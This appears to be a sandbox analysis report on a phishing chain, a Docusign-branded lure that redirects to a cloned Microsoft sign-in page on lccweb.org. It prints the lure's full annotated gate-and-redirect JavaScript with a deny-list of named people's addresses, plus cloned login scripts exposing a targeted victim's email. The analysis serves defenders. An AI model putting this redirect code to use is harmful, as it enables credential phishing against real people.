URL: https://cc.naver.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": true,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://cc.naver.com |
URL: https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "The script demonstrates several high-risk behaviors, including obfuscated code, data exfiltration, and redirects to potentially malicious domains. While the script appears to have some legitimate functionality, such as email validation and blocking, the overall risk is elevated due to the suspicious redirection and the use of encoded strings."
} |
// Analyst note: substitution table consumed by decryptEmail(). Each
// three-character token found in the URL fragment stands for one literal
// character of the recipient's e-mail address ("@", "." and six letters).
// Characters that have no token pass through unchanged, so this is light
// obfuscation of the address, not encryption.
const replacements = {
"q07": "@",
"jx3": ".",
"z9B": "c",
"R15": "o",
"Lh6": "e",
"WPy": "m",
"vk8": "t",
"g4P": "i"
};
// Analyst note: deny-list checked by isEmailBlocked(). A decoded address that
// equals one of these entries is sent to the decoy error page instead of the
// credential page. The sample does not show why these addresses are listed
// (presumably recipients the operator wants kept away from the next stage;
// unconfirmed). All entries are lowercase, which is what the lowercased
// comparison in isEmailBlocked() requires.
const blockedEmails = [
"mario@bancogroup.com.au",
"lhorne@aqualogic.com.au",
"vincenzo.zinni@fusinaproducts.com",
"raz.kc@telrad.com",
"razk@telrad.com",
"keith.isaac@seruminstitute.com",
"ulf.heitmueller@vng.de",
"gilles.feith@luxairgroup.lu"
];
/**
 * Decodes the obfuscated recipient address taken from the URL fragment.
 *
 * Walks the `replacements` table in insertion order and, for each entry,
 * replaces every occurrence of the three-character token with its character
 * (split on the token, join with the character). Despite the name, no key or
 * cipher is involved; anyone holding the table can reverse the encoding.
 *
 * @param {string} encryptedEmail - token-encoded address (already URL-decoded by the caller)
 * @returns {string} the address with all tokens substituted
 */
function decryptEmail(encryptedEmail) {
return Object.entries(replacements).reduce(
(decrypted, [key, value]) => decrypted.split(key).join(value),
encryptedEmail
);
}
/**
 * Reports whether the decoded address is on the `blockedEmails` deny-list.
 *
 * The comparison is an exact match on the lowercased address; it does not
 * match by domain or by substring.
 *
 * @param {string} email - decoded recipient address
 * @returns {boolean} true when the lowercased address is in `blockedEmails`
 */
function isEmailBlocked(email) {
const lowerEmail = email.toLowerCase(); // Ensure case insensitivity
return blockedEmails.includes(lowerEmail);
}
/**
 * Plausibility check on the decoded address.
 *
 * Counts how many of the eight characters that appear as values in
 * `replacements` ("@", ".", "c", "o", "e", "m", "t", "i") occur anywhere in
 * the string, and accepts it when at least half of them do. This is not
 * e-mail syntax validation: it only tests for the presence of those
 * characters, so it mainly rejects empty-looking or unrelated fragments.
 *
 * @param {string} email - decoded recipient address
 * @returns {boolean} true when at least 50% of the table's characters are present
 */
function isValidEmailMatch(email) {
let replacementMatches = 0;
let totalReplacements = Object.keys(replacements).length;
// Count how many of the replacement characters occur in the decoded address
Object.keys(replacements).forEach(key => {
if (email.includes(replacements[key])) {
replacementMatches++;
}
});
// If at least 50% of the replacement characters are present, return true
const matchPercentage = (replacementMatches / totalReplacements) * 100;
return matchPercentage >= 50;
}
/**
 * Gate-and-forward logic of the landing page (analyst annotation).
 *
 * Flow, as visible in this sample:
 *  1. Read the URL fragment, URL-decode it, and decode it with decryptEmail().
 *  2. If the fragment is empty, the address is on the deny-list, or it fails
 *     isValidEmailMatch(), navigate to an error page on 404errorpages.com and stop.
 *  3. Otherwise store the address in sessionStorage under 'email', build a
 *     query string (sessionID, timestamp, uuid, username) and, after a
 *     1500 ms timer, navigate to accounts.lccweb.org with that query string.
 *
 * Notes for defenders:
 *  - The recipient address arrives in the fragment, which browsers do not send
 *    in the HTTP request, so proxy and web-server logs for the landing page
 *    will not contain it. It does appear in the next request, as the
 *    `username` query parameter.
 *  - The fixed parameter set sessionID/timestamp/uuid/username on the second
 *    hop matches the URLs recorded elsewhere in this report and is a usable
 *    pattern for log searches.
 *  - The function is declared async but contains no await.
 *
 * @returns {Promise<void>}
 */
async function redirectToDomain() {
const hash = window.location.hash.substring(1); // Extract hash without '#'
const encodedEmail = decodeURIComponent(hash); // URL-decode the fragment; the tokens are substituted below
if (!encodedEmail) {
console.error("No email found in the URL hash.");
// Visitors arriving without a fragment only ever see the decoy error page
window.location.href = "https://www.404errorpages.com/error";
return;
}
const decryptedEmail = decryptEmail(encodedEmail);
// Check if the email is blocked or doesn't meet the 50% match criteria
if (isEmailBlocked(decryptedEmail) || !isValidEmailMatch(decryptedEmail)) {
console.warn(`Blocked or invalid email detected: ${decryptedEmail}`);
window.location.href = "https://www.404errorpages.com/error";
return;
}
// Proceed to redirection
console.log("Email is valid, proceeding with redirection.");
// Keeps the decoded address in this tab's session storage under the key 'email'
sessionStorage.setItem('email', decryptedEmail);
// Per-visit values; sessionID comes from Math.random (base-36 text), uuid from the Web Crypto API
const randomToken = Math.random().toString(36).substring(2, 15);
const timestamp = Date.now();
const uuid = crypto.randomUUID();
// Create query parameters; URLSearchParams percent-encodes the address (e.g. '@' becomes %40)
const queryParams = new URLSearchParams({
sessionID: randomToken,
timestamp,
uuid,
username: decryptedEmail // Decoded address, passed on to the next stage
}).toString();
// Redirect after progress bar completes (the progress bar itself is not part of this snippet)
setTimeout(() => {
window.location.href = `https://accounts.lccweb.org/?${queryParams}`;
}, 1500); // 1500 ms delay; the original comment said "5 seconds", which does not match this value
}
// Runs the gate-and-forward logic automatically once the DOM is parsed; no user interaction is required.
document.addEventListener('DOMContentLoaded', redirectToDomain);
|
URL: https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPy Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "unknown",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://prestamosgarantizados.com/wvr/#svk8Lh6vLh6njx3lLh6vg4Pnq07qug4Plvk8Lh6rjx3z9BR15WPy Model: Joe Sandbox AI | {
"brands": [
"Docusign"
]
} |
|
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "This JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses dynamic code execution through the `Function` constructor, which can be a high-risk indicator. Additionally, it sends data to external domains, which could potentially lead to data exfiltration. While the intent of the script is not entirely clear, the combination of these behaviors warrants further investigation and a medium-risk score."
} |
!function(){"use strict";var t=function(r,e){return t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,r){t.__proto__=r}||function(t,r){for(var e in r)Object.prototype.hasOwnProperty.call(r,e)&&(t[e]=r[e])},t(r,e)};function r(r,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function n(){this.constructor=r}t(r,e),r.prototype=null===e?Object.create(e):(n.prototype=e.prototype,new n)}function e(t,r,e,n){return new(e||(e=Promise))((function(o,i){function u(t){try{s(n.next(t))}catch(t){i(t)}}function c(t){try{s(n.throw(t))}catch(t){i(t)}}function s(t){var r;t.done?o(t.value):(r=t.value,r instanceof e?r:new e((function(t){t(r)}))).then(u,c)}s((n=n.apply(t,r||[])).next())}))}function n(t,r){var e,n,o,i,u={label:0,sent:function(){if(1&o[0])throw o[1];return o[1]},trys:[],ops:[]};return i={next:c(0),throw:c(1),return:c(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function c(c){return function(s){return function(c){if(e)throw new TypeError("Generator is already executing.");for(;i&&(i=0,c[0]&&(u=0)),u;)try{if(e=1,n&&(o=2&c[0]?n.return:c[0]?n.throw||((o=n.return)&&o.call(n),0):n.next)&&!(o=o.call(n,c[1])).done)return o;switch(n=0,o&&(c=[2&c[0],o.value]),c[0]){case 0:case 1:o=c;break;case 4:return u.label++,{value:c[1],done:!1};case 5:u.label++,n=c[1],c=[0];continue;case 7:c=u.ops.pop(),u.trys.pop();continue;default:if(!(o=u.trys,(o=o.length>0&&o[o.length-1])||6!==c[0]&&2!==c[0])){u=0;continue}if(3===c[0]&&(!o||c[1]>o[0]&&c[1]<o[3])){u.label=c[1];break}if(6===c[0]&&u.label<o[1]){u.label=o[1],o=c;break}if(o&&u.label<o[2]){u.label=o[2],u.ops.push(c);break}o[2]&&u.ops.pop(),u.trys.pop();continue}c=r.call(t,u)}catch(t){c=[6,t],n=0}finally{e=o=0}if(5&c[0])throw c[1];return{value:c[0]?c[1]:void 0,done:!0}}([c,s])}}}Object.create;function o(t){var r="function"==typeof Symbol&&Symbol.iterator,e=r&&t[r],n=0;if(e)return e.call(t);if(t&&"number"==typeof 
t.length)return{next:function(){return t&&n>=t.length&&(t=void 0),{value:t&&t[n++],done:!t}}};throw new TypeError(r?"Object is not iterable.":"Symbol.iterator is not defined.")}function i(t,r){var e="function"==typeof Symbol&&t[Symbol.iterator];if(!e)return t;var n,o,i=e.call(t),u=[];try{for(;(void 0===r||r-- >0)&&!(n=i.next()).done;)u.push(n.value)}catch(t){o={error:t}}finally{try{n&&!n.done&&(e=i.return)&&e.call(i)}finally{if(o)throw o.error}}return u}function u(t,r,e){if(e||2===arguments.length)for(var n,o=0,i=r.length;o<i;o++)!n&&o in r||(n||(n=Array.prototype.slice.call(r,0,o)),n[o]=r[o]);return t.concat(n||Array.prototype.slice.call(r))}function c(t){return this instanceof c?(this.v=t,this):new c(t)}function s(t,r,e){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,o=e.apply(t,r||[]),i=[];return n={},u("next"),u("throw"),u("return",(function(t){return function(r){return Promise.resolve(r).then(t,l)}})),n[Symbol.asyncIterator]=function(){return this},n;function u(t,r){o[t]&&(n[t]=function(r){return new Promise((function(e,n){i.push([t,r,e,n])>1||s(t,r)}))},r&&(n[t]=r(n[t])))}function s(t,r){try{(e=o[t](r)).value instanceof c?Promise.resolve(e.value.v).then(a,l):f(i[0][2],e)}catch(t){f(i[0][3],t)}var e}function a(t){s("next",t)}function l(t){s("throw",t)}function f(t,r){t(r),i.shift(),i.length&&s(i[0][0],i[0][1])}}function a(t){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var r,e=t[Symbol.asyncIterator];return e?e.call(t):(t=o(t),r={},n("next"),n("throw"),n("return"),r[Symbol.asyncIterator]=function(){return this},r);function n(e){r[e]=t[e]&&function(r){return new Promise((function(n,o){(function(t,r,e,n){Promise.resolve(n).then((function(r){t({value:r,done:e})}),r)})(n,o,(r=t[e](r)).done,r.value)}))}}}Object.create;"function"==typeof SuppressedError&&SuppressedError;function l(t){return"function"==typeof t}var f,h=((f=function(t){return 
function(r){t(this),this.message=r?r.length+" errors oc |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns. It includes external data transmission to third-party domains, the use of fallback domains, and aggressive DOM manipulation. While the script appears to have a legitimate purpose related to authentication and user management, the lack of transparency around the data being sent and the use of multiple domains, some of which may be untrusted, warrant further investigation. Overall, this script requires closer review to determine the extent of potential risks."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://l1ve.lccweb.org/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2faccounts.lccweb.org%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASWHnrNXbxc0WNb4JK7dgtvf5rFyBmfk1kGVrmKUZmwcfoXGBlfMDJOYpIoLkktS83Ty0kty8xzKCzNzClJLQKpuMUk6F-U7pkSXuyWmpJalFiSmZ_3iBmn8gssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBbrV-x3LhGXu7h6zTGROP4lYwXCKVT8ytTi0zDev0NM1yzLbpDI7yKzIz9LENaoiK9Aj0sgpIr0y19082cQvyTnS1tLKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EH38vdS3e_fHH8nccrfp2wkMpUfS8zs9JyA7dkfe3MqsLksAi3rPREfxfnjNSS5JQC14hs3zSDfJ9k2w0CDA8EGAA1\u0026login_hint=steven.levin%40quilter.com\u0026estsfed=1\u0026uaid=0bebc2a5a7734821b651a4dd3ea1dbf2\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026fci=https%3a%2f%2fdc8c7f96-3f043121.lccweb.org","urlMsaLogout":"https://l1ve.lccweb.org/logout.srf?iframed_by=https%3a%2f%2faccounts.lccweb.org","urlOtherIdpForget":"https://l1ve.lccweb.org/forgetme.srf?iframed_by=https%3a%2f%2faccounts.lccweb.org","showCantAccessAccountLink":true,"urlGitHubFed":"https://l1ve.lccweb.org/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2faccounts.lccweb.org%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASWHnrNXbxc0WNb4JK7dgtvf5rFyBmfk1kGVrmKUZmwcfoXGBlfMDJOYpIoLkktS83Ty0kty8xzKCzNzClJLQKpuMUk6F-U7pkSXuyWmpJalFiSmZ_3iBmn8gssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBbrV-x3LhGXu7h6zTGROP4lYwXCKVT8ytTi0zDev0NM1yzLbpDI7yKzIz9LENaoiK9Aj0sgpIr0y19082cQvyTnS1tLKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EH38vdS3e_fHH8nccrfp2wkMpUfS8zs9JyA7dkfe3MqsLksAi3rPREfxfnjNSS5JQC14hs3zSDfJ9k2w0CDA8EGAA1\u0026login_hint=steven.le
vin%40quilter.com\u0026estsfed=1\u0026uaid=0bebc2a5a7734821b651a4dd3ea1dbf2\u0026fci=https%3a%2f%2fdc8c7f96-3f043121.lccweb.org\u0026idp_hint=github.lccweb.org","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Belgium~32!!!BZ~Belize~501!!!BJ~Benin~229!!!BM~Bermuda~1!!!BT~Bhutan~975!!!BO~Bolivia~591!!!BQ~Bonaire~599!!!BA~Bosnia and Herzegovina~387!!!BW~Botswana~267!!!BR~Brazil~55!!!IO~British Indian Ocean Territory~246!!!VG~British Virgin Islands~1!!!BN~Brunei~673!!!BG~Bulgaria~359!!!BF~Burkina Faso~226!!!BI~Burundi~257!!!CV~Cabo Verde~238!!!KH~Cambodia~855!!!CM~Cameroon~237!!!CA~Canada~1!!!KY~Cayman Islands~1!!!CF~Central African Republic~236!!!TD~Chad~235!!!CL~Chile~56!!!CN~China~86!!!CX~Christmas Island~61!!!CC~Cocos (Keeling) Islands~61!!!CO~Colombia~57!!!KM~Comoros~269!!!CG~Congo~242!!!CD~Congo (DRC)~243!!!CK~Cook Islands~682!!!CR~Costa Rica~506!!!CI~Cte d\u0027Ivoire~225!!!HR~Croatia~385!!!CU~Cuba~53!!!CW~Curaao~599!!!CY~Cyprus~357!!!CZ~Czechia~420!!!DK~Denmark~45!!!DJ~Djibouti~253!!!DM~Dominica~1!!!DO~Dominican Republic~1!!!EC~Ecuador~593!!!EG~Egypt~20!!!SV~El Salvador~503!!!GQ~Equatorial Guinea~240!!!ER~Eritrea~291!!!EE~Estonia~372!!!ET~Ethiopia~251!!!FK~Falkland Islands~500!!!FO~Faroe Islands~298!!!FJ~Fiji~679!!!FI~Finland~358!!!FR~France~33!!!GF~French Guiana~594!!!PF~French Polynesia~689!!!GA~Gabon~241!!!GM~Gambia~220!!!GE~Georgia~995!!!DE~Germany~49!!!GH~Ghana~233!!!GI~Gibraltar~350!!!GR~Greece~30!!!GL~Greenland~299!!!GD~Grenada~1!!!GP~Guad |
URL: https://7981e0f9-3f043121.lccweb.org/shared/1.0/co... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a polyfill for the Promise API, which is a common and legitimate practice. However, it also includes some behaviors that warrant further review, such as the use of dynamic code execution (via `setTimeout`) and potential data exfiltration (sending data to external domains). Additionally, the script is obfuscated, which increases the risk. Overall, the script exhibits a mix of low-risk and moderate-risk indicators, resulting in a medium risk score."
} |
/*!
* ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------
*
* This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
*
* json2.js (2016-05-01)
* https://github.lccweb.org/douglascrockford/JSON-js
* License: Public Domain
*
* Provided for Informational Purposes Only
*
* ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
*/!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else 
a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t, |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 2,
"reasoning": "The provided JavaScript snippet appears to be a part of a web page loading and debugging utility. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The script is primarily focused on handling document ready and load events, as well as providing a simple logging mechanism through the `$Debug` object. While it uses some legacy APIs like `XDomainRequest`, these pose minor risks and are not inherently malicious. Overall, this script seems to be a benign utility with no clear signs of malicious intent."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("name","")),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector(" |
URL: https://accounts.lccweb.org Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://accounts.lccweb.org |
URL: https://accounts.lccweb.org/?sessionID=09hwlaox0a5... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that require further review. While it includes some legitimate functionality like analytics and configuration settings, there are also indicators of potential data exfiltration and the use of obfuscated URLs. The overall behavior is not clearly malicious, but the script requires closer inspection to ensure there are no hidden risks."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://7981e0f9-3f043121.lccweb.org/shared/1.0/","urlDefaultFavicon":"https://7981e0f9-3f043121.lccweb.org/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/login.srf?sessionID=09hwlaox0a5x\u0026timestamp=1734514206388\u0026uuid=8c08baae-0b4f-475b-a71c-2729b6ced8ea\u0026username=steven.levin%40quilter.com\u0026client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://accounts.lccweb.org/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://9e1641f2-3f043121.lccweb.org/{0}/winauth/sso?client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b","iwaSsoProbeUrlFormat":"https://9e1641f2-3f043121.lccweb.org/{0}/winauth/ssoprobe?client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b","iwaIFrameUrlFormat":"https://9e1641f2-3f043121.lccweb.org/{0}/winauth/iframe?client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://9e1641f2-3f043121.lccweb.org/common/winauth/sso/edgeredirect?client-request-id=fce047cb-be44-4baf-b341-dd18251b7c6b\u0026origin=login.microsoftonline.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateF
